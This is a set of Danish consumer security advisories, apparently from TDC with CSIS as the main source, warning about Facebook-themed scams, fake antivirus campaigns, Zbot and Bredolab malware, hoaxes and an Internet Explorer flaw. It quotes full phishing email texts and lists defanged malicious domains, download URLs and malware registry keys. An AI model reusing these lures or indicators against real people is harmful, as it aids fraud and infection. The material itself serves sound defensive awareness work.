I de seneste 24 timer har der kørt to skadelige bannere, som alle blev vist på den webside, som man kom igennem på Facebook, og som har tvunget spillere og besøgende videre til websider. På disse sider tilbyder der falske antivirus-programmer.

Populære bannere

Funny Farm er et populært online spil for mange Facebook brugere. I Danmark spiller flere tusinde mennesker dagligt 'Funny Farm', hvor de opbygger virtuelle landbrug og dyrker varer, der så kan byttes med hinanden.
Firmaet bag 'Funny Farm' lever, som så mange andre gratis online services, af banner-reklamer. Bannerne bliver vist mange gange på det populære spil, og det er banner-leverandører villige til at betale penge for. Men de it-kriminelle kan naturligvis og desværre også udnytte bannerne til at gennemføre såkaldt malvertizing - altså farlig kode via bannerne.

I de konkrete tilfælde er kampagnen blevet lanceret med et flashbanner, der inkluderer flere såkaldte 'actionscripts'.

Så pas på hvad du klikker på, hvis du er bondemand på Facebook.

De skadelige domæner

De peger vilkårlige brugere mod domænet (mellemrum indlagt af CSIS): justim pression.com via bannere for "greetingcards.com".

De skadelige domæner, som aktivt indgår i denne kampagne, er listet herunder (mellemrum indlagt af CSIS)

scan-a nd-protect3.com
scan-a nd-protect5.com
scan-a nd-protect7.com
scan-a nd-protect8.com
scan-a nd-remove10.com
scan-a nd-remove55.com
scan-a nd-remove99.com
1serve r-antivirus.com
2serve r-antivirus.com
4serve r-antivirus.com
6serve r-antivirus.com
1web-a ntivirus.com
2web-a ntivirus.com
try6-y our-scanner.com
111-yo ur-scanner.com
222-yo ur-scanner.com
basket balltickets2.com
batman 2010.com
spread 2010.com
termin ator-2010.com

Kilde: CSIS Security Group

 

Får du mail om et portkort fra din familie, skal du bare slette mailen. Der er ikke gode nyheder med.

Sikkerhedsfirmaet CSIS har henover weekenden stoppet et betydeligt antal spammails sendt til vilkårlige modtagere.

Den uønskede mail foregiver at være et postkort, men den vedhæftede fil, som er pakket i zip, er et falsk antivirus-værktøj, som ved kørsel simulerer talrige infektioner på maskinen i forsøget på at skræmme brugeren til at købe en licens.

Spammailen ankommer med følgende indhold:

Fra: [Spoofet / forfalsket afsender adresse]

Emnelinje: You've received a postcard

Indhold:

Good day.

Your family member has sent you an ecard
If you wish to keep the ecard longer, you may save it on your computer or take a print.
To view your ecard, open zip attached file

Vedhæftet:
postcard.zip --> postcard.exe

Den har ikke noget postkort men en masse skidt med sig. Så slet mailen.

Den tekniske side

Hvis den vedhæftede fil pakkes ud og køres af en uforsigtig bruger, vil den droppe hovedkomponenten til mappen:
[%Documents and Settings%}]\[%brugernavn%]\Local Settings\Application Data\ave.exe

Den injekter sig samtidig i en række legitime processer og opretter sig som en service, så den uønskede software vil køres efter en genstart af maskinen.

I næste fase forbinder den sig til en række domæner, hvorfra den automatisk trækker supplerende malware (mellemrum indlagt af CSIS):

onec are-antivirus2010.com
secu ritypc-care.com
winl ive-care21.com
secu ritypccare2010.com
live -pc-care.com
pc-l ive-care2010.com
pc-l ive-care.com
one- care-antivirus.com
pc-l ivecare2010.com
pc-l ive-care.com
one- care-antivirus.com
live -pccare2010.com
dert abuniokas.com
wind ows-live-care.com

Den skadelige vedhæftede kode fanges af TDC's Sikkerhedspakke.

Kilde: CSIS Security Group

 

It-kriminelle spammer for øjeblikket skadelige mails ud til vilkårlige brugere. Der lokkes med Facebook, som er et kendt social netværk for mange danskere, og det kan øge risikoen for at danske brugere lader sig friste til at åbne den vedhæftede zip fil.

Spammailen ankommer med følgende indhold:

Fra: Facebook Service

Emne: Facebook Password Reset Confirmation! Important Message

Indhold: Dear user of facebook,

Because of the measures taken to provide safety to our clients, your password has been changed.

You can find your new password in attached document.

Thanks,

Your Facebook.

Facebook_password_485.zip --> Facebook_password_485.exe

Mailen påstår, at du har fået et nyt Facebook kodeord, som du kan se i den vedhæftede fil.
Men slet mailen - den har ikke nogen gode nyheder til dig.

Alt du kan forestille dig

Det malware, der er i filen, er hvad man kan forvente: downloadere, en trojaner der stjæler passwords, falske sikkerhedsprogrammer eller flere af dem afhængig af, hvad der lige er lagt i din mail.

McAfee skriver på deres hjemmeside, at truslen på kort tid nåede en placering som nummer seks på firmaets topti over de globalt mest udbredte trusler. Den står for så meget som ti procent af alle de inficerede mails, som McAfees systemer holder øje med.

Den vedhæftede fil er i Bredolab familien og vil ved kørsel med det samme forbinde sig til domænet (mellemrum indlagt af CSIS):
funn ylive2010.ru.

Den dropper sig som en temporær fil til systemet og kopierer sig herefter ned i windows systemmappen som "nnfj.tqo". Denne lægges ind i flere processer blandt andet svchost.exe, hvorved der opnås adgang til en server, og hvorfra der automatisk hentes supplerende komponenter. Bredolab anvender en såkaldt userland kernel rootkit teknik og kan være besværlig at fjerne fra en inficeret maskine.

Kilde: CSIS Security Group

 

Falsk applikation lover dig, at du kan holde øje med hvem, der besøger din Facebook-profil.

En bølge af falske programmer bølger hen over Facebook og lover dig fuldt indblik i, hvem der kigger forbi din profil. Men det er falske applikationer, der slet ikke gør noget for dig.

Rik Ferguson, senior security konsulent hos sikkerhedsfirmaet Trend Micro, advarer og fortæller, at han allerede har identificeret 25 forskellige kopier af den samme falske applikation, der bruger forskellige navne så som: peeppeep-pro, profile-check-online og stalk-my-profile.

Når du så har brugt applikationen, forsøger den at lokke dine venner til også at falde for tricket.

- Applikationen i sig selv er designet, så den ser overbevisende ud, men ingen af de mange 'Fortsæt-knapper', som er i programmet, aktiverer noget som helst profil-besøgs-tjek. Knapperne skubber dig bare videre over i endnu en Facebook-applikation, som spammerne kan tjene penge på at henvise til,' forklarer Ferguson.

Som et interessant twist kreerer mindst en af applikationerne en fotomontage af alle dine Facebook-venner - alle vennerne får så også en invitation til den nyttesløse applikation.
Men fakta er, at applikationerne faktisk ikke gør noget som helst udover at give profit til bagmændene.

Applikationen har tilsyneladende tilpasset sig de ændringer, der er sket på Facebook, som gør, at det er sværere at sende notifikationer direkte til dine venner gennem applikationer.

Rik Ferguson kan se, at Facebook allerede har fjernet flere af applikationerne, men der er stadig god grund til at sørge for ikke at hoppe i fælden.

Han råder folk til at lade være med at klikke på linksene til disse applikationer. Der er ikke nogen officiel Facebook funktionalitet, som gør, at du kan se, hvem der har tjekket din profil.

Kilde: Rik Ferguson, Trend Micro

 

It-kriminelle er ude efter dine kreditkort-informationer og misbruger PBS' navn i deres spammail.

Adskillige medier advarer om en mail, der spredes i Danmark i dette øjeblik. Mailen udgiver sig for at være fra PBS og er ude efter oplysninger om dine kreditkort.

Har du allerede fulgt anvisningerne i den falske mail, skal du skynde dig at få spærret de pågældende kort, råder PBS på deres hjemmeside.

Mailen ser således ud:

Fra: PBS Kortsystemer
Dato: 7. mar. 2010 05.10
Emne: Meddelelse om begrænset kontoadgang (PBS Kortsystemer)
Til:

Som et led i vores sikkerhedsforanstaltninger gennemgår vi jævnligt aktivitet i PBS-systemet. Under en nylig gennemgang har vi opdaget et problem med din konto.

For at kunne imødekomme bestemmelserne i den finansielle servicebranche, har vi brug for flere oplysninger til at bekræfte din identitet.
Download og udfyld formularen.

Venlig hilsen

PBS Compliance-afdelingen

Modtager du den, skal du ikke besvare mailen eller åbne det vedhæftede dokument. I stedet skal du bare slette mailen.

PBS giver det følgende gode råd på deres hjemmeside:

Vær opmærksom på, at PBS, banker eller de internationale kortselskaber aldrig sender e-mails, eller kontakter dig telefonisk, for at bede om dit kortnummer, udløbsdato, kontrolcifre eller PIN-kode. Skulle du modtage sådan en henvendelse, bør du ikke besvare den eller udlevere dine kortoplysninger!

Kilde: TDC

 

En tilsyneladende uskyldig mail fra en Facebook-ven kan betyde, at du skal reinstallere hele din pc.

Der er naturligvis intet uskyldigt i virkeligheden over den mail, du modtager. Den udgiver sig for at være fra én af dine Facebook-venner.

Mailen indeholder et link til en video eller YouTube, og klikker du på linket, har andre brugere oplevet, at der dukker en besked op, om at antivirusprogrammet skal opdateres. Og går man videre herfra, er det at ulykken rammer ens pc, skriver Politiken.dk. Se et eksempel på mailen nederst i artiklen.

Det vil nemlig betyde en trojansk hest på pc'en, og den er ikke til at komme af med igen. Så den eneste løsning på problemet lige nu er at reinstallere hele din pc.
Det vil sige, at du mister alt, hvad der ligger på den, medmindre du har taget backup.

Når du klikker på linket, får du samtidig sendt beskeden rundt til alle dine Facebook-kontaktpersoner og udsætter dem for samme fare.

Så det eneste råd, der kan gives lige nu, er at passe rigtig godt på med, hvad du klikker på - og især siger ja til.

I det eksempel vi har set, er det eneste indhold i mailen linket til videoen og mailen har emnet Youtube. Så indtil videre må du holde øje med den slags mails og være opmærksom, når du går i din indbakke på Facebook.
Men det kan jo desværre ændre sig.

Lige nu er der ikke nogen antivirus-programmer, der fanger den farlige virus.

Kilde TDC 

Weekenden har budt på flere bølger af Messenger-spam, som skal lokke vilkårlige brugere til at klikke på skadelige links.

Der er set flere forskellige kampagner, som blandt andet har til formål at installere falske sikkerhedsprodukter.

Et eksempel på indholdet af typiske MSN Messenger spambeskeder findes herunder (mellemrum indlagt af CSIS):

http://forbid den-pics-of-you.com/?gallery=magicmike&invite=rLuP2dWsqqK7uMKbppiRoLCpd7rRlXzS0YaGj7hqRXmgz7nowZiZ46iltoU=

lol girls vs girls .. hahaha .. nice site .. check it out
http://forg et-ur-secr ets-wid-me.com/?invite=rLuP2dWsqqK7uMKbppiRoLCpd7rRlXzS0YaGj7hqRXmgz7nowb6x5afbvoU=

http://magic mike.forget-ur-s ecrets-wid-me.com/?invite=rLuP2dWsqqK7uMKbppiRoLCpd7rRlXzS0YaGj7hqRXmgz7now6ih5qel2IU=
awesome site!! im there now..

oh my God!!!! cant belive you could be so cheap o( lol ...
http://your-dam n-secrets-reve aled.com/?gallery=magicmike&invite=rLuP2dWsqqK7uMKbppiRoLCpd7rRlXzS0YaGj7hqRXmgz7npw6id46m1roU=

Kig godt på linksene og sørg for, at der ringer en klokke, når de eller nogen lignende beskeder dukker op.

Kilde: CSIS Security Group

 

I den kommende tid kan du risikere at få spammails, der vil lokke brugernavn og password ud af dig.

Sikkerhedsfirmaet CSIS har stoppet et betydeligt antal spammails, hvor målet er at lokke brugernavne og passwords fra uforsigtige brugere.

De uønskede e-mail ankommer med følgende indhold (mellemrum indlagt af CSIS):

Fra: [Spoofet / forfalsket afsender adresse]

Emnelinje:
Your profile will be locked in response to a complaint received by the Administration

Indhold:

***This message was created automatically by mail-delivery software. Do not reply to this message.***

Hello!
Your profile will be locked in response to a complaint received by the Administration 29.01.2010 ã.
According to "paragraph 8 of the user agreement, sydbank.dk reserves the right to suspend or terminate the provision of services sydbank.dk, promptly notifying the user.

Refute the statement may be, following this link:
http://l97.c o.cc/9a01df4b2


If the application is not rejected within 7 days, your e-mail an account will be blocked.
It has a number 428257027890639.

In the near future we will contact you.
It takes up to 3 days to process your request.
Thank you!
--------------------------------
Sincerely,
mail support service
[%domænenavn på e-mail modtager%]

De mange forskellige domæner, herunder såkaldte URL forkorter services, er alle inaktive i skrivende stund.
Hovedparten flytter trafik mod parkerede domæner, som skal tjene penge på "klik".

Du skal altså bare slette disse henvendelser og ikke tro på dem, selvom de udgiver sig for at være fra officielle kilder.

Kilde: CSIS Security Group

 

Hvis du får tilsendt kædebrev på Facebook, som skal kopieres til din status, skal du bare slette den.

Et kædebrev, som minder om det 'Hallmark virus' kædebrev, som netop har cyklet rundt i danske indbakker, rundsendes nu i god tro blandt bekymrede Facebook-brugere.
Kædebrevet indeholder de sædvanlige tricks, som karakteriserer kædebreve og fup.

Den ankommer med følgende ordlyd:

VIGTIGT. Gå ind på Konto. Klik på privatindstillinger. Klik på blokeringsliste. I skrivefeltet ved navn skriver du automation lab. (husk punktum) Tryk på bloker. Hvis der kommer en liste med nogle navne, skal du blokkere hver enkel af dem. Disse mennesker har adgang til din facebook konto/profil og spionerer på hvad du......... laver. Kopier og send videre..... der var 5 på min liste som nu er blokeret...".

Det vigtige her er, at denne funktion findes, men at den er legitim, og knyttet til en blokrings/privacy feature i Facebook.

Du skal bare slette disse beskeder ved modtagelse. Send dem IKKE videre. De giver udelukkende anledning til unødig bekymring, og kan føre til, at man udfører uønskede handlinger på sin Facebook profil. Derudover er det regulært tidsspilde.

Der er forøvrigt tale om et kædebrev/hoax, som er blevet oversat til dansk, og som i den seneste uge også har været rundsendt flittigt blandt engelsksprogede Facebook brugere.

Kilde: CSIS Security Group 

Din internetforbindelse bliver lukket

Får du mail om, at du har gjort noget ulovligt på nettet, skal du bare slette den vedhæftede, farlige fil.

Ormen Bredolab er blevet spammet ud til vilkårlige modtagere med en trussel om, at deres internetforbindelse afbrydes grundet misbrug.
Samme lokkemad er blevet anvendt af banden tidligere, men det afholder dem ikke fra at prøve tricket igen for at få flere pc'ere i deres net af fjernstyrede pc'er.

Den uønskede e-mail ankommer med følgende indhold:

Fra: [Spoofet / forfalsket afsender adresse]

Emnelinje: Your internet access is going to get suspended

Indhold:

Your internet access is going to get suspended

The Internet Service Provider Consorcium was made to protect the rights of software authors, artists.
We conduct regular wiretapping on our networks, to monitor criminal acts.

We are aware of your illegal activities on the internet wich were originating from

You can check the report of your activities in the past 6 month that we have attached. We strongly advise you to stop your activities regarding the illegal downloading of copyrighted material of your internet access will be suspended.

Sincerely
ICS Monitoring Team

Vedhæftet:
report.zip --> report.exe

Mailen siger, at du har foretaget dig ulovligheder på nettet, og at den vedhæftede fil er et dokument, der viser dine aktiviteter de sidste 6 måneder.
Formålet er naturligvis at få dig til at klikke på den vedhæftede fil.

Den er nemlig en zip fil, der indeholder en binær fil, som er pakket med en cryptor, der besværliggør statisk og dynamisk analyse. Formålet er at installere et falsk sikkerhedsprogram på maskinen, som brugeren skal tvinges til at købe. Programmet deaktiverer de almindelige, rigtige antivirus-programmer og ringer til en server, hvorfra der kan distribueres opdateringer til inficerede maskiner.

Den skadelige kode fanges af TDC's Sikkerhedspakke, og du skal blot slette mailen med det samme.

Kilde: CSIS Security Group




 

Zbot spredes ved brug af Facebook

Vær vågen på Facebook, så du ikke klikker på links med skadelig kode.



Informationstyven Zbot anvendes i et nyt angreb, hvor man blot skal besøge en hjemmeside for at få den skadelige kode på sin pc.

Spredningen foregår ved at inficerede maskiner misbruges til automatisk at
sende beskeder og poste vægbeskeder til venner og bekendte via Facebook.

Det sker ved at lokke med en besked om et foto og en URL (mellemrum indlagt
af CSIS):
http://readthis313475644147170803236.easy-sha rez.com/gp735q/

Samme taktik praktiseres af koobface banden. Intet tyder på, at der derudover er relation til dette angreb og Koobface.

Den pågældende webside indeholder et obfuskeret javascript, der videredirigerer brugeren til en falsk Facebook login side indeholdende en IFRAME, der tvinger brugeren til en server, hvorfra der indlæses flere pakker med skadelig kode baseret på hvilken browser, der anvendes, og hvilket land brugeren kommer fra.

Det skadelige script flytter brugeren til følgende URL (mellemrum indlagt
af CSIS)

http://109.9 5.115.35/fsp/in.php

Denne webside serverer til et script, og der åbnes et særligt udformet PDF dokument, der forsøger at udnytte flere sårbarheder i Adobe Reader og Acrobat (Adobe Collaboverflow, Adobe util.printf overflow, Adobe getIcon).
Samtidig indlæses også "sNode.php", der leverer andre former for skadelige exploits rettet mod bl.a. Microsoft Internet Explorer, Java JRE og Microsoft Office. Hvis systemet er sårbart og uopdateret, vil ondsindet kode køre i hukommelsen.

Hvis systemet er sårbart trækkes en binær fil fra følgende URL (mellemrum
indlagt af CSIS):

http://109.9 5.115.35/fsp/load.php
--> http://109.9 5.115.35/fsp/file.exe

Filen er en Zbot variant, der dropper klassisk Zbot kode til maskinen og
forbinder den til en ZeuS understøttet server.

Så det korte af det lange er, at du skal lade være med at klikke på beskeder på Facebook, der ser ud som linket øverst i artiklen.

Kilde: CSIS Security Group



 

Hallmark-fupmail hærger igen

Hallmark-hoaxen dukker op med jævne mellemrum - denne gang med politiet som afsender.

Hallmark-fupmailen er efterhånden en årligt tilbagevendende begivenhed i de danske indbakker.

Vi har set den adskillige gange, og må stadig konstatere, at folk bliver bange for, at der rent faktisk findes en virus, som kan brænde hele harddisken af.

Denne type mails skal slettes og IKKE videresendes. Det er komplet spild af tid. Den omtalte virus findes altså ikke - der er tale om løgn fra den ene ende til den anden.

Her er den tekst, som sendes rundt - og som bare skal slettes:

Videresend denne advarsel blandt venner, familie og kontakter.

I løbet af de næste par dage - forsøg ikke at åbne nogen besked med titlen "POSTKORT FRA HALLMARK",

uanset hvem der sendte den til dig. Det er en virus, der åbner et postkortbillede som "brænder" hele harddisken C på din computer.

Denne virus vil blive modtaget af nogen, der har din E-mailadresse i deres kontaktliste. Derfor er du nødt til at advare alle dine kontaktpersoner - det er bedre at få dette budskab 25 gange end at modtage virus og åbne det.

Hvis du modtager en mail kaldet postkort - skønt sendt til dig fra en ven - må du ikke åbne den. Slet den omgående og sluk computeren øjeblikkeligt.

Dette er den værste virus bebudet af CNN. Den er blevet klassificeret af Microsoft som den mest ødelæggende virus nogensinde.
Denne virus blev opdaget af McAfee i går og der er ingen reparation endnu for denne type virus. Denne virus ødelægger harddiske hvor vigtige oplysninger opbevares.

Giv denne advarsel til dine venner. Husk: Hvis du sender advarslen, vil det være til gavn for alle.



Med venlig hilsen

Midt- og Vestjyllands Politi

______________________________________
Lene H. Gabel, politiassistent

Lokalpolitiet i Thisted
Vold og Straffelov
Telefon: 9619 1490 Mobil: 72 58 30 65
Lokal: 4139

Politiet har naturligvis ikke sendt denne skrøne rundt.


Kilde: TDC 

Har du også modtaget den her besked på Facebook

ADVARSEL!>>>>>HAR DIN FACEBOOK VÆRET LANGSOM PÅ DET SIDSTE? GÅ TIL “INDSTILLINGER” OG VÆLG “APPLIKATIONSINDSTILLINGER”, ÆNDRE TIL “TILFØJET TIL PROFIL” HVIS DU SER EN DER ER HEDDER “UNAVNGIVEN APP.” SÅ SLET DEN! DET ER EN INTERNAL SPYBOT. SEND VIDERE … DETTE ER IKKE EN JOKE! DEN VAR PÅ MIN!!!!!!…

Eller på engelsk:

ALERT ALERT >>>>> Has your facebook been running slow lately? Go to “Settings” and select “application settings”, change the dropdown box to “added to profile”. If you see one in there called “un named app” delete it… Its an internal spybot. Pass it on…..

Så er du den heldige modtager af endnu en virus hoax.

Hvis du følger instruktionerne og kigger godt efter, så har du med 99% sandsynlighed den omtalte Unknown App liggende, men hvis du sletter den, vil du opdage at Boxes tabben forsvinder fra din profilside.
For den ukendte applikation er intet andet end din Boxes tab, som af en eller anden grund har mistet sit navn.

Kilde : TheDotfactor 

Gidseltagning af dine data er it-kriminelles nyeste våben i kampen for at tjene penge.

It-sikkerhedsfirmaet F-Secure har identificeret en ny trojaner, som krypterer personlige filer og forlanger penge for at levere dem tilbage, men samtidig er den så avanceret, at du ofte ikke opdager, at du er blevet narret.
F-Secure råder til forsigtighed og anbefaler at du tager backup af dine data.

Michael Dahl, Director Regional Operations F-Secure, vurderer, at den nye trojaner er så avanceret, at mange slet ikke vil opdage, at de bliver ramt, før det er for sent.

Den nye 'datakidnapper-trojan' fungerer ved at kryptere for eksempel dokumenter, video- eller musikfiler og få det til at se ud som om, at filerne er blevet korrupte og skal repareres.
Dernæst genererer trojaneren en besked, der ligner en ægte Windows-melding, med instrukser om at downloade reparationsprogrammet Data Doctor 2010. Men så snart programmet er installeret, får du at vide, du skal købe hele programmet for at reparere de øvrige 'beskadigede' filer på harddisken.
Det koster 450 kr. at købe programmet, og først når pengene er betalt, har man igen adgang til sine data.
Ifølge Michael Dahl vil det hænde, at brugere oplever, at de ikke har anden udvej end at betale, samtidig med at de ofte vil være uvidende om, at de faktisk betaler løsepenge for at få deres data igen.

- Vi har tidligere set lignende vira, men ingen så avanceret som denne ransom virus. Trojaneren er så troværdig, at man let får opfattelsen af, at der er tale om et ægte hjælpeprogram, og filerne i virkeligheden blot skal repareres.
Der vil derfor være brugere, som muligvis slet ikke opdager, at de faktisk betaler en slags løsepenge for deres data. De fleste vil blot være lettet over ikke at miste familiebilleder eller vigtige arbejdsdokumenter. Man kan derfor sagtens forestille sig, at nogle brugere ligefrem kan anbefale, hvad der tilsyneladende er et effektiv reparationsprogram til deres venner, fordi de oplever, at det virker,' siger Michael Dahl.

Ifølge Michael Dahl er DatCrypt-trojaneren et eksempel på, hvor sofistikeret de it-kriminelles metoder og våben er blevet, og at det derfor er endnu vigtigere, at man i dag husker it-sikkerheden, når man bevæger sig ud i cyberspace. En effektiv måde at sikre sig på er at sørge for, at man jævnligt tager backup af sine data enten gennem eksterne backup diske, CD'er eller med online backupsystemer.

Kilde: F-Secure 

Ekstra Microsoft-opdatering

På grund af en særlig farlig fejl udsender Microsoft en ekstra opdatering. Sørg for at opdater din pc.

Helt uden for den normale tirsdags-opdaterings-cyklus har Microsoft frigivet 7 vigtige opdateringer.

Den ene af opdateringerne lukker et meget omtalt og problematisk hul, som kunne føre til at it-kriminelle kunne plante skadelig kode på din pc uden dit vidende, hvis du besøgte særlige hjemmesider. Læs mere i artiklen Pas på hul i Internet Explorer.

Opdateringen vedrører samtlige versioner af Microsoft Internet Explorer.

Det er derfor supervigtigt, at du opdaterer med det samme.

Automatisk opdatering
TDC Online anbefaler, at du henter opdateringerne hurtigst muligt. Hvis din computer ikke er sat til automatisk at hente opdateringerne, skal du selv hente dem hos Microsoft Update.

Hent opdateringer automatisk
Du kan nemt tjekke, om din computer er sat op til at hente opdateringerne automatisk sådan her:

Højreklik på Denne computer på Skrivebordet
Vælg Egenskaber
Under fanebladet Automatiske opdateringer kan du se, om du har slået automatisk opdatering.
Hvis du downloader opdateringen manuelt og lægger den på din pc, skal du også huske at installere den. Dobbeltklik på filen og følg vejledningen.

Kilde: TDC
 

En kritisk sårbarhed i Internet Explorer betyder, at du skal passe ekstra på med at besøge ukendte sider i disse dage.

Det er lykkes it-kriminelle at finde en ny fejl i Internet Explorer, som betyder, at du kan få farlig og skadelig kode plantet på din pc uden dit vidende, hvis du besøger særlige hjemmesider. Der er tale om en informationstyv, som kan hente oplysninger på din pc.

Da vi jo desværre ikke kender disse sider, og de kan skyde op med lynets hast, så opfordrer vi til, at du udviser særlig påpasselighed i disse dage overfor mails med links til sites, du ikke kender - eller får fra uventet side.
Du kan også bruge en anden browser som Google Chrome eller Mozilla Firefox, som begge er gratis at hente og bruge.

Versioner

Sårbarheden i Microsoft Internet Explorer (Microsoft Internet Explorer DOM Operation Memory Corruption Vulnerability) omfatter følgende versioner af IE og Windows:

Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4, og Internet Explorer 6, Internet Explorer 7 og Internet Explorer 8 på Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, og Windows Server 2008 R2.

Er du i tvivl om hvad, du selv bruger, kan du få hjælp på tdc.dk/support.

Kritisk fejl
CSIS kategoriserer denne sårbarhed som kritisk og forudser flere angreb mod Microsoft Internet Explorer.
Microsoft undersøger i øjeblikket sårbarheden med henblik på at frigive en sikkerhedsopdatering.

Den tekniske side af sagen

Vil du vide mere om hvad, der ligger bag denne sårbarhed, kan du læse denne tekniske beskrivelse fra sikkerhedsfirmaet CSIS.

Fejlen skyldes en invalid pointer reference i Microsoft Internet Explorer. Det er muligt for en it-kriminel at udnytte denne 0-dags fejl og tilgå den invalide pointer efter et objekt er blevet slettet. Herigennem åbnes der risiko for kørsel af ondsindet kode på systemet med samme rettigheder som den påloggede bruger.

Angrebet udføres via klient side drive-by angreb hvor et offer, eksempelvis igennem et link i en spammail, skal lokkes til en fjendtlig webside.

CSIS har analyseret den publiserede exploit kode, som er indlejret på skadelige websider. Vi har blacklistet 5 domæner, som anvendes som platform i disse angreb.

Når en bruger besøger en af de ondsindede websider, der er misbrugt i dette angreb (flere angreb vil skyde op og payloaden vil ændre sig!) så droppes filen Rasmon.dll til windows systemmappen. Denne komponent injektes i systemprocessen "SVCHOST.EXE" hvorved den omgår forskellige personlige firewalls. Den modificerer dernæst registreringsdatabasen:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RaSlrGH
"ImagePath" = [%windows systemmappen%]\svchost.exe -k netsvcs

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RaSlrGH
"Start"= 02, 00, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RaSlrGH\Parameters
"ServiceDll" = [%windows systemmappen%]\rasmon.dll

Microsoft har frigivet et særligt 'Security Advisory' der bekræfter sårbarheden.

Kilde: CSIS Security Group

 

Pas på falske jordskælvs-søgeord

It-kriminelle udnytter jordskælvet i Haiti. Pas på, hvad du klikker på, hvis du søger efter informationer.

Det voldsomme jordskælv på Haiti har med god grund ramt samtlige medier
over hele verden.

Sikkerhedsfirmaet CSIS ved, at it-kriminelle udnytter verdensomspændende nyheder og katastrofer til at sprede skadelig kode. Og også denne gang er der grund til
at udvise forsigtighed.

At it-kriminelle udnytter søgemaskiner til at gennemføre SEO kampagner, når denne type nyheder rammer de internationale medier vil det typisk blive udnyttet til at suge
almindelige brugere til skadelige websider, hvorfra der kan lanceres skadelig
kode.

Sikkerhedsfirmaer vil naturligvis følge situationen og holde øje med de domæner, der dukker op.

Kilde: CSIS Security Group

 

Weekenden har budt på talrige spamruns med både skadelige vedhæftede filer og indlejrede links. Der er brugt mange forskellige temaer, som skal lokke uforsigtige brugere til at åbne filen eller klikke på linket.

De mange spammails udspringer hovedsagligt fra det BOTnet, der kendes som Avalanche/Rock.
Det primære formål med de mange spammails er at inficere brugere med informationstyven 'Zbot', men også tyven 'Bredolab' er blevet distribueret i weekenden i et stort antal.

Eksempel på spamrun

Herunder har sikkerhedsfirmaet CSIS samlet nogle eksempler på weekendens mange spamruns.

Emne: new settings file for [%modtager adressen%]

Indhold:

"The default settings of your mailbox were automatically changed. Please download and launch a file with a new set of settings for your e-mail account:

fx-settings-file.exe.
[link peger på [%fastr flux domæne%]/owa/service_directory/settings.php?email=[%modtager e-mail adresse%]&from=[%domæne%]&fromname=[%modtager navn%]

We constantly work on the quality level of our service, as well as on the development of its security and protection. During the last upgrade several essential improvements were adopted, such as new ports for the POP3 & SMTP protocols, plus the SMTP autentification. The new settings are necessary for those who use the mailings clients (for ex. Microsoft Outlook, The Bat!, Mozilla Thunderbird etc.) or those who use our service via the web-interface."

Indholdet kan variere, men handler om din mailkonto og ting, du skal foretage dig i forbindelse med den. Vær yderst mistænksom, når nogen beder dig gøre noget i forhold til din mailkonto. Det er meget sjældent, at du får mails fra din danske mailudbyder på engelsk. Husk det.

Den skadelige kode er designet til at ringe hjem til en server, hvorfra den automatisk henter supplerende komponenter og en krypteret skabelon, som indeholder de mål, der skal stjæles data fra og foretages MiTB (Man in The Browser) baserede angreb imod. Listen består primært af online netbank-systemer.

De domæner der misbruges i denne kampagne omfatter (mellemrum indlagt af CSIS):

http://nek ovo.ru/cbd/nekovo.bri
http://nek ovo.ru/kissme/rec.php
http://74.12 5.67.100/webhp
http://stoma id.ru/abs.exe
http://nekov o.ru/ip.php

Udvis forsigtighed med ovenstående adresser.

IRS Employers W-2 Forms
Et andet spamrun, som også blev skudt i gang i weekenden, anvender et særligt udformet PDF-dokument.

Det skadelige dokument bliver ikke opdaget af ret mange antivirus-produkter og vil ved kørsel på sårbare systemer forbinde til en C&C server, hvorfra den henter flere skadelige programmer. Den omgår med med en særlig connect back forbindelse de fleste firma firewalls og muliggør fjernstyring af systemer.

Den ankommer med emnelinjen 'IRS Employers W-2 forms' og med den medfølger en .doc fil, lavet i Microsoft Word, som har indlejret et PDF-dokument.
Den skadelig payload er en PoisonIVY variant, som kan anvendes til informationstyveri. DOC/PDF dokumentetet fanges af meget få antivirusprogrammer.

Forhåbentlig får titlen på dokumentet ikke ret mange danskere til at klikke.

Spear phishing

CSIS har endvidere set forsøg på spear phishing angreb, hvor modtagere skal lokkes til at klikke på en URL (mellemrum indlagt af CSIS):

85.10.2 43.125/bbh/pdf.php. Den pågældende URL udnytter tre forskellige sårbarheder i Adobe Acrobat/Reader herunder en 0-dags sårbarhed som forventes fixet i morgen med en ny version af den populære PDF læser.

Kilde: CSIS Security Group
 

Fupmail om nyt login på Facebook

Slet mailen, hvis du får besked om, at der er kommet et nyt loginsystem på Facebook.

It-kriminelle hiver endnu en gang et trick ud af ærmet for at få dig til at hoppe på limpinden og få hevet dine personlige oplysninger ud af dig - eller værre endnu at få kontrol over din maskine.

I en mail, der skal se ud som om, at den kommer direkte fra folkene bag Facebook, bliver du gjort opmærksom på, at der er kommet et nyt login-system på Facebook - for at gøre tjenesten mere sikker naturligvis.
Men før du kan bruge det nye system, skal du lige opdatere din konto, og det gør du ved at klikke på linket i mailen.

Det skal du naturligvis ikke gøre. Slet blot mailen og forsæt med at logge ind på Facebook, som du plejer.
 

20-12-2009


-PAS PÅ FARLIG NETBANKTYV

-GODE JULE TIPS


Er du inficeret af Patcher?

Finansrådet advarer mod udspekuleret netbanktyv. Tjek om du er inficeret og sørg for at få opdateret din pc.

Patcher er navnet på en raffineret informationstyv, som trods en generelt høj sikkerhed i de danske netbanker, er i stand til at gennemføre uautoriserede transaktioner fra inficerede maskiner.

100 forskellige varianter

Denne netbanktyv findes i mere end 100 forskellige varianter. Patcher er blevet plantet på ikke-opdaterede systemer igennem drive-by angreb. Det vil sige systematiske angreb, hvor en tilsyneladende uskadelig hjemmeside tilbyder et script, som misbruger sårbarheder i browseren og populære tredjeparts-produkter, såsom Adobe Reader, Adobe Flash eller Microsoft Office.
Af samme årsag anbefaler sikkerhedsfirmaet CSIS og TDC, at du opdaterer din pc med alle relevante opdateringer.

Du kan få et hurtigt tjek af din pc på websiden http://tjekpc.dk, som er stillet til rådighed af Bankernes EDB Central.

Gratis Patcher-værktøj fra CSIS
CSIS anbefaler, at du scanner din pc for at tjekke, om den er inficeret med den skadelige kode.
De har på vegne af Finansrådet udviklet et gratis værktøj, som hurtigt kan bruges til at afgøre, om maskinen er inficeret. I modsætning til diverse antivirus-programmer kan dette værktøj detekte samtlige varianter af Patcher bagdøren:

https://www.csis.dk/dk/media/Detector.zip
https://www.csis.dk/dk/media/Detector.exe
